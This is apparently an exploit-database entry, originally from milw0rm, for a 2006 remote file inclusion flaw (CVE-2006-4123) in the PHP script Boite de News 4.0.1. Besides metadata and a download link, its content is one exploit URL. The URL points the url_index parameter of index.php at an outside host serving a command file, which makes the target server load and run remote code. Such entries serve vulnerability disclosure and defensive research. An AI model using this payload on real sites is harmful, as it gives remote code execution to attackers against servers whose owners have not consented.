Boite de News 4.0.1 - 'index.php' Remote File Inclusion

Author: the master
type: webapps
platform: php
port: 
date_added: 2006-08-08 
date_updated:  
verified: 1 
codes: OSVDB-29747;CVE-2006-4123 
tags: 
aliases:  
screenshot_url:  
application_url: 

########################################################################
#  Boite de News v4.0.1  Remote File Inclusion Vulnerability
#
#  Download: ftp://ftp1.comscripts.com/PHP/1801_boiteden-401.zip
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/boitenews4/index.php?url_index=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-09]